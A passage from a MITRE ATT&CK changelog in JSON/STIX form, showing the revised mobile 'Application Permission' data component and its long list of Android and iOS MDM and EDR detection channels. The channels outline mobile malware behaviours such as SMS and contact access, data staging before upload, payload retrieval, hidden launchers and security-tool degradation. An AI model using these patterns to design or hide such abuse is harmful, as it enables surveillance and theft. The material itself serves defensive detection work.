nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">aded&nbsp;dynamically&nbsp;-&nbsp;Hidden&nbsp;native&nbsp;libraries&nbsp;in&nbsp;APK&nbsp;assets&nbsp;-&nbsp;D</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ropped&nbsp;payloads&nbsp;stored&nbsp;within&nbsp;the&nbsp;app&nbsp;sandbox&nbsp;&nbsp;iOS:&nbsp;&nbsp;-&nbsp;Embed</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ded&nbsp;frameworks&nbsp;-&nbsp;Configuration&nbsp;files&nbsp;within&nbsp;the&nbsp;application&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">bundle&nbsp;-&nbsp;Hidden&nbsp;scripts&nbsp;or&nbsp;secondary&nbsp;binaries&nbsp;packaged&nbsp;with&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">the&nbsp;app&nbsp;&nbsp;Collection&nbsp;Methods&nbsp;-&nbsp;Mobile&nbsp;EDR&nbsp;application&nbsp;inspect</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion&nbsp;-&nbsp;Static&nbsp;application&nbsp;analysis&nbsp;-&nbsp;Application&nbsp;package&nbsp;scan</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ning&nbsp;during&nbsp;install&nbsp;or&nbsp;sideload&nbsp;events&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-03-13 20:00:08.487000+00:00",
                    "modified": "2026-04-23 18:21:10.349000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0114",
                            "external_id": "DC0114"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Application Permission",
                    "description": "Represents the permissions, entitlements, or capability grants associated with a mobile application, including both permissions declared by the application and those granted or requested during runtime.\n\nMonitoring permission state helps defenders identify applications attempting to access protected device resources such as sensors, storage, communications interfaces, or system services.\n\nExamples include:\n\nAndroid\n\n- Permissions declared in AndroidManifest.xml\n- Runtime permission prompts\n- Special access privileges (AccessibilityService, overlay, device admin)\n\niOS\n\n- App entitlements in provisioning profiles\n- Privacy permission prompts\n- Capability grants for device services\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Application Vetting",
                            "channel": "None"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "READ_EXTERNAL_STORAGE / MANAGE_EXTERNAL_STORAGE permission present or toggled at runtime"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Application granted or retaining RECORD_AUDIO permission or privileged CAPTURE_AUDIO_OUTPUT capability"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Application installed with NSMicrophoneUsageDescription entitlement indicating microphone capability"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Application granted/retaining ACCESS_FINE_LOCATION and/or ACCESS_COARSE_LOCATION; background location capability present (ACCESS_BACKGROUND_LOCATION on Android 10+)"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "App installed with location usage declarations (WhenInUse/Always usage description) and granted authorization level via managed policy state"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Device inventory changes involving phone number/line identifier fields (when available), eSIM profile presence, or compliance signal indicating SIM profile change"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Managed device inventory change indicating cellular plan/eSIM profile updates (where available via supervised iOS + MDM reporting)"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "New permission prompt, package install attempt, accessibility/overlay special access request, or other post-browse capability escalation following browser/WebView activity"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Post-browse configuration profile prompt, managed/unmanaged app handoff anomaly, or compliance-relevant state change shortly after browser activity"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "ADB_DEBUGGING_ENABLED"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Compliance posture or restriction state relevant to accessory access, USB restricted mode, supervised trust policy, or backup/pairing restrictions"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Application gains or is observed with elevated interaction capability such as accessibility, overlay, device admin, notification access, or other authentication-adjacent special access"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App with network-, telephony-, Wi-Fi-, or location-adjacent capability is impacted by abrupt repeated service loss while permissions remain unchanged"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Network- or location-dependent app capability state remains unchanged while the app experiences sustained communication failure"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application holds or is granted broad storage, document-provider, media, or file-management capability inconsistent with its expected role before or during bulk file transformation"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Known application or newly updated version declares, gains, or activates expanded storage, sensor, communications, accessibility, or device-management capability inconsistent with prior baseline or app role"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Known application version declares, activates, or exhibits new entitlements, privacy permissions, or capability use inconsistent with prior baseline or business role"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Known application version declares, gains, or first exercises storage, communications, accessibility, advertising, analytics, overlay, or sensor-adjacent capability inconsistent with prior version baseline or business role"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Device enrollment or compliance event shows failed or degraded verified boot, hardware-backed attestation mismatch, patch/build/baseband inconsistency, or unexpected device property drift near first contact"
                        },
                        {
                            "name": "android:MDMLog ",
                            "channel": "Application granted or retaining the READ_CALENDAR or WRITE_CALENDAR permissions. "
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Supervised enrollment, activation, or inventory event reveals unexpected device property relationships, anomalous managed posture, unexplained configuration drift near first contact, or identity/inventory characteristics inconsistent with approved procurement baseline"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed or trusted app is newly installed or updated and presents changed package identity, signing relationship, version lineage, installer source, or permission posture inconsistent with approved baseline"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Supervised managed app is newly installed or updated and presents unexpected version transition, inventory drift, managed-state change, or app attribute mismatch against approved procurement and release baseline"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "App communicating with legitimate web-service infrastructure is unmanaged, newly installed, recently updated, outside approved app list, or shows baseline drift in role, installer source, or expected capability profile"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Managed app communicating with legitimate web-service infrastructure is newly installed, recently updated, outside expected managed-app set, or displays baseline drift in app role, release path, or business justification"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "App initiating resolver\u2192pivot sequence was unmanaged or not authorized to communicate with detected web-service class or external infrastructure"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Bundle performing resolver\u2192pivot sequence not present in approved managed-app baseline or lacks expected service relationship"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "App identity performing bidirectional exchange was unmanaged, outside approved app baseline, or not permitted to use detected public web-service class for read/write operations"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Bundle performing bidirectional exchange was not present in approved managed-app baseline or was not permitted to use detected public web-service class for read/write operations"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "App identity performing repeated one-way retrieval was unmanaged, outside approved app baseline, or not permitted to use detected public web-service class for background content retrieval"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Bundle performing repeated one-way retrieval was not present in approved managed-app baseline or was not permitted to use detected public web-service class for background content retrieval"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "App identity using non-standard protocol-to-port pairing was unmanaged, outside approved app baseline, or not permitted to communicate using detected protocol/service over observed destination port"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "App identity performing camera session was unmanaged, recently granted camera permission, or not approved to use camera for video or interval image capture"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Application granted or retaining the READ_CALL_LOG permission. "
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Application granted or retaining the READ_CONTACTS permission."
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Bundle performing camera session was not present in approved managed-app baseline or was not permitted to use camera for video or interval image capture"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Application granted or retaining the READ_SMS or RECEIVE_SMS permission."
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "App identity performing screen capture had unapproved accessibility posture, capture-related special access, unmanaged state, or was not approved for screen recording or assistive observation workflows"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "NotificationListenerService enabled OR notification access granted to app not in enterprise-approved list"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "App not in enterprise-approved list performing network + crypto behavior inconsistent with declared functionality"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "App not in approved cryptographic or secure communication category performing keypair + encryption + transmission behavior"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed app with undeclared secure transport behavior or app category mismatch initiates opaque TLS communications inconsistent with enterprise policy baseline"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Supervised managed app with undeclared secure transport behavior or unexpected network role communicates with non-baselined destination over opaque TLS"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed application with no declared backup, sync, export, or media-editing role performs bulk local packaging or encrypted archive generation"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Supervised managed app without expected export, backup, or sync role performs local data staging behavior followed by opaque upload activity"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed app granted or retaining storage-related or elevated access inconsistent with declared function prior to local data access activity"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Supervised managed app without expected local export, sync, or forensic role accesses or stages local records inconsistent with policy baseline"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed app without approved content-download, update, browser, or file-sync role performs remote payload retrieval and local tool staging"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Supervised managed app without approved update, browser, sync, or enterprise-content role retrieves and stages secondary content inconsistent with policy baseline"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed application without approved native-code role or expected high-performance/native dependency exhibits native execution behavior inconsistent with enterprise policy baseline"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed application package version, signer lineage, installer source, or app identity changes outside approved enterprise or store-mediated update workflow"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed app granted SEND_SMS or RECEIVE_SMS permission, or app role/policy indicates SMS-capable behavior inconsistent with approved enterprise function before SMS control activity"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Default SMS handler changes to non-baselined application or managed app unexpectedly becomes or remains device default SMS app during SMS control phase"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed app without approved VPN, enterprise tunneling, browser, or remote-access role exhibits proxy-like traffic handling inconsistent with policy baseline"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed app granted call-control-relevant permissions or telecom role state inconsistent with approved enterprise function before call-control activity"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Default phone or telecom-handling role changes to non-baselined application or managed app unexpectedly becomes dialer/call-handling app during call-control phase"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "device transitions to non-compliant state + root detected or integrity attestation failure (SafetyNet/Play Integrity)"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "application integrity mismatch or package signature inconsistency relative to expected deployment baseline"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "application granted high-risk permission or special access (AccessibilityService, SYSTEM_ALERT_WINDOW, DeviceAdmin) with abnormal grant pattern (e.g., no recent user interaction or rapid sequence of grants)"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "application granted Device Administrator privilege + abnormal activation pattern (e.g., rapid enablement after install or no recent user interaction)"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "application holds permissions enabling environment validation (e.g., location, phone state, nearby device/network context) and subsequently delays protected activity until qualifying values are present"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "application has approved capabilities required for conditional execution (e.g., location/background modes) but observed behavior is deferred until target-specific state is present"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "application granted ACCESS_FINE_LOCATION and, when required for background operation, ACCESS_BACKGROUND_LOCATION + capability state sufficient for persistent geolocation monitoring before later guarded activity"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "application authorized for when-in-use or always location access and, where relevant, background execution capability sufficient for continued geographic evaluation before later guarded behavior"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "managed app inventory or launcher-visible state changes show application remains installed but user-facing entry point or launcher component becomes disabled before later runtime activity"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "installed application remains present while launcher-visible activity or component discoverability changes to hidden, disabled, or synthesized-settings-entry state prior to later runtime activity"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "change to security-relevant device configuration or managed policy (e.g., accessibility enablement, app admin changes, security service state change) preceding telemetry degradation"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "application enabled as device administrator, device owner, profile owner, or equivalent elevated management role before uninstall attempt"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "application granted accessibility service privileges capable of screen observation or global action invocation before removal attempt"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "application enabled as device administrator, device owner, or profile owner before screen-lock or password-control activity"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "application granted accessibility service privileges capable of intercepting UI flow or sustaining user-interaction denial before lockout event"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "device posture changes to rooted, non-compliant, weakened security state, or elevated control role becomes active before security-tool degradation"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "security-relevant application package state, enabled status, administrator state, or managed protection setting changes immediately before monitoring degradation"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "device posture or compromise-state indicators change unexpectedly, including rooted or non-compliant status disappearance, after prior app or system activity suggesting persistence on device"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "managed application state changes unexpectedly through uninstall, disappearance from expected inventory, or install-state mismatch after prior suspicious activity"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "application holds device-owner, profile-owner, or delegated app-management authority capable of package removal before uninstall event"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "application has accessibility service privileges immediately before package-removal UI flow and subsequent application disappearance"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "device posture indicates rooted, compromised, or non-compliant state before package files disappear without standard managed uninstall workflow"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "application holds device administrator, device owner, or other managed authority capable of wipe or destructive device-level action before bulk file loss or wipe event"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "device posture indicates rooted, compromised, or non-compliant state before protected or atypical filesystem deletion activity"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:21:10.349000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['name']\": {\"new_value\": \"Application Permission\", \"old_value\": \"Permissions Requests\"}, \"root['description']\": {\"new_value\": \"Represents the permissions, entitlements, or capability grants associated with a mobile application, including both permissions declared by the application and those granted or requested during runtime.\\n\\nMonitoring permission state helps defenders identify applications attempting to access protected device resources such as sensors, storage, communications interfaces, or system services.\\n\\nExamples include:\\n\\nAndroid\\n\\n- Permissions declared in AndroidManifest.xml\\n- Runtime permission prompts\\n- Special access privileges (AccessibilityService, overlay, device admin)\\n\\niOS\\n\\n- App entitlements in provisioning profiles\\n- Privacy permission prompts\\n- Capability grants for device services\\n\", \"old_value\": \"Permissions declared in an application's manifest or property list file\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,17 @@\\n-Permissions declared in an application's manifest or property list file\\n+Represents the permissions, entitlements, or capability grants associated with a mobile application, including both permissions declared by the application and those granted or requested during runtime.\\n+\\n+Monitoring permission state helps defenders identify applications attempting to access protected device resources such as sensors, storage, communications interfaces, or system services.\\n+\\n+Examples include:\\n+\\n+Android\\n+\\n+- Permissions declared in AndroidManifest.xml\\n+- Runtime permission prompts\\n+- Special access privileges (AccessibilityService, overlay, device admin)\\n+\\n+iOS\\n+\\n+- App entitlements in provisioning profiles\\n+- Privacy permission prompts\\n+- Capability grants for device services\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][1]\": {\"name\": \"android:logcat\", \"channel\": \"READ_EXTERNAL_STORAGE / MANAGE_EXTERNAL_STORAGE permission present or toggled at runtime\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"android:MDMLog\", \"channel\": \"Application granted or retaining RECORD_AUDIO permission or privileged CAPTURE_AUDIO_OUTPUT capability\"}, \"root['x_mitre_log_sources'][3]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Application installed with NSMicrophoneUsageDescription entitlement indicating microphone capability\"}, \"root['x_mitre_log_sources'][4]\": {\"name\": \"android:MDMLog\", \"channel\": \"Application granted/retaining ACCESS_FINE_LOCATION and/or ACCESS_COARSE_LOCATION; background location capability present (ACCESS_BACKGROUND_LOCATION on Android 10+)\"}, \"root['x_mitre_log_sources'][5]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"App installed with location usage declarations (WhenInUse/Always usage description) and granted authorization level via managed policy state\"}, \"root['x_mitre_log_sources'][6]\": {\"name\": \"android:MDMLog\", \"channel\": \"Device inventory changes involving phone number/line identifier fields (when available), eSIM profile presence, or compliance signal indicating SIM profile change\"}, \"root['x_mitre_log_sources'][7]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Managed device inventory change indicating cellular plan/eSIM profile updates (where available via supervised iOS + MDM reporting)\"}, \"root['x_mitre_log_sources'][8]\": {\"name\": \"android:MDMLog\", \"channel\": \"New permission prompt, package install attempt, accessibility/overlay special access request, or other post-browse capability escalation following browser/WebView activity\"}, \"root['x_mitre_log_sources'][9]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Post-browse configuration profile prompt, managed/unmanaged app handoff anomaly, or compliance-relevant state change shortly after browser activity\"}, \"root['x_mitre_log_sources'][10]\": {\"name\": \"android:MDMLog\", \"channel\": \"ADB_DEBUGGING_ENABLED\"}, \"root['x_mitre_log_sources'][11]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Compliance posture or restriction state relevant to accessory access, USB restricted mode, supervised trust policy, or backup/pairing restrictions\"}, \"root['x_mitre_log_sources'][12]\": {\"name\": \"android:MDMLog\", \"channel\": \"Application gains or is observed with elevated interaction capability such as accessibility, overlay, device admin, notification access, or other authentication-adjacent special access\"}, \"root['x_mitre_log_sources'][13]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App with network-, telephony-, Wi-Fi-, or location-adjacent capability is impacted by abrupt repeated service loss while permissions remain unchanged\"}, \"root['x_mitre_log_sources'][14]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Network- or location-dependent app capability state remains unchanged while the app experiences sustained communication failure\"}, \"root['x_mitre_log_sources'][15]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application holds or is granted broad storage, document-provider, media, or file-management capability inconsistent with its expected role before or during bulk file transformation\"}, \"root['x_mitre_log_sources'][16]\": {\"name\": \"android:MDMLog\", \"channel\": \"Known application or newly updated version declares, gains, or activates expanded storage, sensor, communications, accessibility, or device-management capability inconsistent with prior baseline or app role\"}, \"root['x_mitre_log_sources'][17]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Known application version declares, activates, or exhibits new entitlements, privacy permissions, or capability use inconsistent with prior baseline or business role\"}, \"root['x_mitre_log_sources'][18]\": {\"name\": \"android:MDMLog\", \"channel\": \"Known application version declares, gains, or first exercises storage, communications, accessibility, advertising, analytics, overlay, or sensor-adjacent capability inconsistent with prior version baseline or business role\"}, \"root['x_mitre_log_sources'][19]\": {\"name\": \"android:MDMLog\", \"channel\": \"Device enrollment or compliance event shows failed or degraded verified boot, hardware-backed attestation mismatch, patch/build/baseband inconsistency, or unexpected device property drift near first contact\"}, \"root['x_mitre_log_sources'][20]\": {\"name\": \"android:MDMLog \", \"channel\": \"Application granted or retaining the READ_CALENDAR or WRITE_CALENDAR permissions. \"}, \"root['x_mitre_log_sources'][21]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Supervised enrollment, activation, or inventory event reveals unexpected device property relationships, anomalous managed posture, unexplained configuration drift near first contact, or identity/inventory characteristics inconsistent with approved procurement baseline\"}, \"root['x_mitre_log_sources'][22]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed or trusted app is newly installed or updated and presents changed package identity, signing relationship, version lineage, installer source, or permission posture inconsistent with approved baseline\"}, \"root['x_mitre_log_sources'][23]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Supervised managed app is newly installed or updated and presents unexpected version transition, inventory drift, managed-state change, or app attribute mismatch against approved procurement and release baseline\"}, \"root['x_mitre_log_sources'][24]\": {\"name\": \"android:MDMLog\", \"channel\": \"App communicating with legitimate web-service infrastructure is unmanaged, newly installed, recently updated, outside approved app list, or shows baseline drift in role, installer source, or expected capability profile\"}, \"root['x_mitre_log_sources'][25]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Managed app communicating with legitimate web-service infrastructure is newly installed, recently updated, outside expected managed-app set, or displays baseline drift in app role, release path, or business justification\"}, \"root['x_mitre_log_sources'][26]\": {\"name\": \"android:MDMLog\", \"channel\": \"App initiating resolver\\u2192pivot sequence was unmanaged or not authorized to communicate with detected web-service class or external infrastructure\"}, \"root['x_mitre_log_sources'][27]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Bundle performing resolver\\u2192pivot sequence not present in approved managed-app baseline or lacks expected service relationship\"}, \"root['x_mitre_log_sources'][28]\": {\"name\": \"android:MDMLog\", \"channel\": \"App identity performing bidirectional exchange was unmanaged, outside approved app baseline, or not permitted to use detected public web-service class for read/write operations\"}, \"root['x_mitre_log_sources'][29]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Bundle performing bidirectional exchange was not present in approved managed-app baseline or was not permitted to use detected public web-service class for read/write operations\"}, \"root['x_mitre_log_sources'][30]\": {\"name\": \"android:MDMLog\", \"channel\": \"App identity performing repeated one-way retrieval was unmanaged, outside approved app baseline, or not permitted to use detected public web-service class for background content retrieval\"}, \"root['x_mitre_log_sources'][31]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Bundle performing repeated one-way retrieval was not present in approved managed-app baseline or was not permitted to use detected public web-service class for background content retrieval\"}, \"root['x_mitre_log_sources'][32]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"App identity using non-standard protocol-to-port pairing was unmanaged, outside approved app baseline, or not permitted to communicate using detected protocol/service over observed destination port\"}, \"root['x_mitre_log_sources'][33]\": {\"name\": \"android:MDMLog\", \"channel\": \"App identity performing camera session was unmanaged, recently granted camera permission, or not approved to use camera for video or interval image capture\"}, \"root['x_mitre_log_sources'][34]\": {\"name\": \"android:MDMLog\", \"channel\": \"Application granted or retaining the READ_CALL_LOG permission. \"}, \"root['x_mitre_log_sources'][35]\": {\"name\": \"android:MDMLog\", \"channel\": \"Application granted or retaining the READ_CONTACTS permission.\"}, \"root['x_mitre_log_sources'][36]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Bundle performing camera session was not present in approved managed-app baseline or was not permitted to use camera for video or interval image capture\"}, \"root['x_mitre_log_sources'][37]\": {\"name\": \"android:MDMLog\", \"channel\": \"Application granted or retaining the READ_SMS or RECEIVE_SMS permission.\"}, \"root['x_mitre_log_sources'][38]\": {\"name\": \"android:MDMLog\", \"channel\": \"App identity performing screen capture had unapproved accessibility posture, capture-related special access, unmanaged state, or was not approved for screen recording or assistive observation workflows\"}, \"root['x_mitre_log_sources'][39]\": {\"name\": \"android:MDMLog\", \"channel\": \"NotificationListenerService enabled OR notification access granted to app not in enterprise-approved list\"}, \"root['x_mitre_log_sources'][40]\": {\"name\": \"android:MDMLog\", \"channel\": \"App not in enterprise-approved list performing network + crypto behavior inconsistent with declared functionality\"}, \"root['x_mitre_log_sources'][41]\": {\"name\": \"android:MDMLog\", \"channel\": \"App not in approved cryptographic or secure communication category performing keypair + encryption + transmission behavior\"}, \"root['x_mitre_log_sources'][42]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed app with undeclared secure transport behavior or app category mismatch initiates opaque TLS communications inconsistent with enterprise policy baseline\"}, \"root['x_mitre_log_sources'][43]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Supervised managed app with undeclared secure transport behavior or unexpected network role communicates with non-baselined destination over opaque TLS\"}, \"root['x_mitre_log_sources'][44]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed application with no declared backup, sync, export, or media-editing role performs bulk local packaging or encrypted archive generation\"}, \"root['x_mitre_log_sources'][45]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Supervised managed app without expected export, backup, or sync role performs local data staging behavior followed by opaque upload activity\"}, \"root['x_mitre_log_sources'][46]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed app granted or retaining storage-related or elevated access inconsistent with declared function prior to local data access activity\"}, \"root['x_mitre_log_sources'][47]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Supervised managed app without expected local export, sync, or forensic role accesses or stages local records inconsistent with policy baseline\"}, \"root['x_mitre_log_sources'][48]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed app without approved content-download, update, browser, or file-sync role performs remote payload retrieval and local tool staging\"}, \"root['x_mitre_log_sources'][49]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Supervised managed app without approved update, browser, sync, or enterprise-content role retrieves and stages secondary content inconsistent with policy baseline\"}, \"root['x_mitre_log_sources'][50]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed application without approved native-code role or expected high-performance/native dependency exhibits native execution behavior inconsistent with enterprise policy baseline\"}, \"root['x_mitre_log_sources'][51]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed application package version, signer lineage, installer source, or app identity changes outside approved enterprise or store-mediated update workflow\"}, \"root['x_mitre_log_sources'][52]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed app granted SEND_SMS or RECEIVE_SMS permission, or app role/policy indicates SMS-capable behavior inconsistent with approved enterprise function before SMS control activity\"}, \"root['x_mitre_log_sources'][53]\": {\"name\": \"android:MDMLog\", \"channel\": \"Default SMS handler changes to non-baselined application or managed app unexpectedly becomes or remains device default SMS app during SMS control phase\"}, \"root['x_mitre_log_sources'][54]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed app without approved VPN, enterprise tunneling, browser, or remote-access role exhibits proxy-like traffic handling inconsistent with policy baseline\"}, \"root['x_mitre_log_sources'][55]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed app granted call-control-relevant permissions or telecom role state inconsistent with approved enterprise function before call-control activity\"}, \"root['x_mitre_log_sources'][56]\": {\"name\": \"android:MDMLog\", \"channel\": \"Default phone or telecom-handling role changes to non-baselined application or managed app unexpectedly becomes dialer/call-handling app during call-control phase\"}, \"root['x_mitre_log_sources'][57]\": {\"name\": \"android:MDMLog\", \"channel\": \"device transitions to non-compliant state + root detected or integrity attestation failure (SafetyNet/Play Integrity)\"}, \"root['x_mitre_log_sources'][58]\": {\"name\": \"android:MDMLog\", \"channel\": \"application integrity mismatch or package signature inconsistency relative to expected deployment baseline\"}, \"root['x_mitre_log_sources'][59]\": {\"name\": \"android:MDMLog\", \"channel\": \"application granted high-risk permission or special access (AccessibilityService, SYSTEM_ALERT_WINDOW, DeviceAdmin) with abnormal grant pattern (e.g., no recent user interaction or rapid sequence of grants)\"}, \"root['x_mitre_log_sources'][60]\": {\"name\": \"android:MDMLog\", \"channel\": \"application granted Device Administrator privilege + abnormal activation pattern (e.g., rapid enablement after install or no recent user interaction)\"}, \"root['x_mitre_log_sources'][61]\": {\"name\": \"android:MDMLog\", \"channel\": \"application holds permissions enabling environment validation (e.g., location, phone state, nearby device/network context) and subsequently delays protected activity until qualifying values are present\"}, \"root['x_mitre_log_sources'][62]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"application has approved capabilities required 